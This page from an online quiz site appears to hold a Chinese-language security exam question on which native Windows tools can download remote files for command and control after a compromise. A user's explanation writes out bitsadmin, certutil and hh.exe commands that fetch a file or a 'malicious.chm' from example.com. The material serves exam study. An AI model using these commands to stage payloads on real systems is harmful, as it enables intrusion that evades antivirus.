阿摩線上測驗
複選題
40. 【題組 5 背景描述如附圖】成功滲透到某個網站後,為了避
免觸發相關警示而通知 IT 人員,於是採用「免殺(迴避防
毒軟體的偵測)」的手法。發現該主機為一台 Windows 10 所
搭建網站系統,決定使用 Windows 作業系統中相關工具程
式來進行 Command & Control,下面哪些 Windows 作業系統
「原生」指令可以使用在遠端下載?
(A) Bitsadmin.exe
(B) Certutil.exe
(C) HH.exe
(D) Update.exe
答案:登入後查看
統計: A(466), B(474), C(369), D(203), E(0) #3102171
統計: A(466), B(474), C(369), D(203), E(0) #3102171
詳解 (共 1 筆)
hiiii
#6343082
逐一說明每個選項是否為 Windows 原生命令且能進行遠端下載:
(A) Bitsadmin.exe
✅ 正確
- Bitsadmin 是 Windows 作業系統內建工具,利用 BITS (Background Intelligent Transfer Service) 可用於下載檔案,經常被攻擊者利用作為隱匿下載的手法。
範例:
bitsadmin /transfer myDownloadJob /download /priority normal "http://example.com/file.exe" C:\Temp\file.exe(B) Certutil.exe
✅ 正確
- Certutil 是 Windows 原生的憑證管理工具,也可用來從遠端 URL 下載檔案,因此也經常被攻擊者利用。
範例:
certutil -urlcache -split -f http://example.com/file.exe C:\Temp\file.exe(C) HH.exe
✅ 正確
- HH.exe(HTML Help) 是 Windows 內建的說明文件閱讀程式,曾被證實可用來透過特殊的 .chm 文件從遠端載入內容以間接下載或執行惡意程式。因此可視為間接遠端下載的原生工具。
範例(間接方法,載入遠端.chm):
hh.exe http://example.com/malicious.chm(D) Update.exe
❌ 錯誤
- Update.exe 並非 Windows 10 作業系統內建原生的通用工具,通常屬於第三方軟體或更新程式的一部分,並非系統預設可用來進行下載。
因此,本題正確可遠端下載的 Windows 原生指令為:
? (A)、(B)、(C)
(D) 非 Windows 原生工具,故不選。
0
0
